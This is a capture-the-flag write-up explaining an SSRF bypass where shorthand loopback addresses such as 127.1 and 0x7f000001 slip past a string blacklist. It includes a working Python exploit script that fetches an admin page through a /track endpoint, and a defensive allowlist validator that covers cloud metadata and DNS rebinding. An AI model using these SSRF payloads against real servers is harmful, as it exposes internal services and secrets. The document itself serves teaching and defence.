post-webapp
SRC: https://library.m0unt41n.ch/challenges/post-webapp

By abusing alternate loopback notations like 127.1 or 0x7f000001, we glide past the naive filter without raising alarms. The server then fetches our crafted URL from 127.0.0.1, so the admin route trusts the request and happily serves the flag. It's a textbook reminder that blacklists age poorly: use allowlists or strict CIDR checks on the resolved address, or expect your secrets to be public.

Here's the exploit script I came up with:

Python:
#!/usr/bin/env python3
import re
import sys

import requests
import urllib3

urllib3.disable_warnings()

WEBAPP = "https://x.library.m0unt41n.ch:1337"
# 127.1 is parsed as 127.0.0.1 by the resolver, so the string-match filter lets it through
TRACK_SS = "http://127.1:5000/admin"


def get_flag():
    # /track fetches the submitted URL server-side, which is the SSRF sink
    r = requests.post(
        f"{WEBAPP}/track",
        data={"url": TRACK_SS},
        timeout=10,
        verify=False,
    )
    r.raise_for_status()
    # the admin page served over loopback contains the flag
    m = re.search(r"Flag:\s*([A-Za-z0-9_\-!{}]+)", r.text)
    if not m:
        raise RuntimeError("uffi")
    return m.group(1)


def main():
    flag = get_flag()
    print(f"[+] flag found uwu: {flag}")


if __name__ == "__main__":
    try:
        main()
    except Exception as e:
        sys.exit(f"[-] error: {e}")
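To show why the string blacklist falls over and what the allowlist/CIDR-style check from the paragraph above looks like, here is an added example that is not part of the challenge or of the script above. `naive_is_safe` is my reconstruction of the kind of filter the writeup describes (an exact-string deny list); `is_safe_target` normalises shorthand literals (127.1, 0x7f000001, decimal, IPv4-mapped IPv6) through libc's `inet_aton` semantics and the `ipaddress` module, resolves real hostnames through an injectable `resolver` (the default is `socket.gethostbyname`; the tests pass a stub so nothing touches the network), and rejects anything loopback, private, link-local, reserved, multicast or unspecified. Behaviour of `socket.inet_aton` on shorthand forms follows the C library, which is an assumption about the platform.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Deny list modelled on the naive filter the writeup bypassed (constructed for illustration).
NAIVE_BLACKLIST = {"127.0.0.1", "localhost"}


def naive_is_safe(url: str) -> bool:
    """Exact-string deny list: passes 127.1, 0x7f000001, [::1] and friends."""
    host = urlsplit(url).hostname or ""
    return host not in NAIVE_BLACKLIST


def canonical_ip(host: str):
    """Return an ipaddress object for an address literal, including the shorthand
    forms the resolver accepts (127.1, 0x7f000001, 2130706433, 0177.0.0.1), or None
    if the host is not an address literal at all."""
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        pass
    try:
        # libc inet_aton accepts 1-, 2- and 3-part dotted forms plus hex/octal/decimal
        packed = socket.inet_aton(host)
    except OSError:
        return None
    return ipaddress.IPv4Address(packed)


def is_safe_target(url: str, resolver=socket.gethostbyname) -> bool:
    """Allow only http(s) URLs whose *resolved* address is globally routable."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False
    host = parts.hostname
    if not host:
        return False
    ip = canonical_ip(host)
    if ip is None:
        # Real hostname: resolve it and judge the address, not the name
        try:
            ip = ipaddress.ip_address(resolver(host))
        except (OSError, ValueError):
            return False
    # ::ffff:127.0.0.1 is loopback in disguise; unwrap IPv4-mapped IPv6
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    blocked = (
        ip.is_loopback
        or ip.is_private
        or ip.is_link_local      # covers 169.254.169.254 cloud metadata
        or ip.is_reserved
        or ip.is_multicast
        or ip.is_unspecified     # 0.0.0.0 reaches localhost on Linux
    )
    return not blocked


if __name__ == "__main__":
    for candidate in ("http://127.1:5000/admin", "http://0x7f000001/admin",
                      "http://[::ffff:127.0.0.1]/", "http://169.254.169.254/"):
        print(f"{candidate:35} naive={naive_is_safe(candidate)} strict={is_safe_target(candidate)}")
```

One caveat the paragraph hints at with "strict CIDR checks": validating the resolved address is only worth anything if the fetch then connects to that same address. If the fetcher resolves the name a second time, a DNS answer that changes between check and use (rebinding) gets around this too, so pass the vetted IP to the HTTP client and set the Host header yourself, and do the same check on every redirect hop.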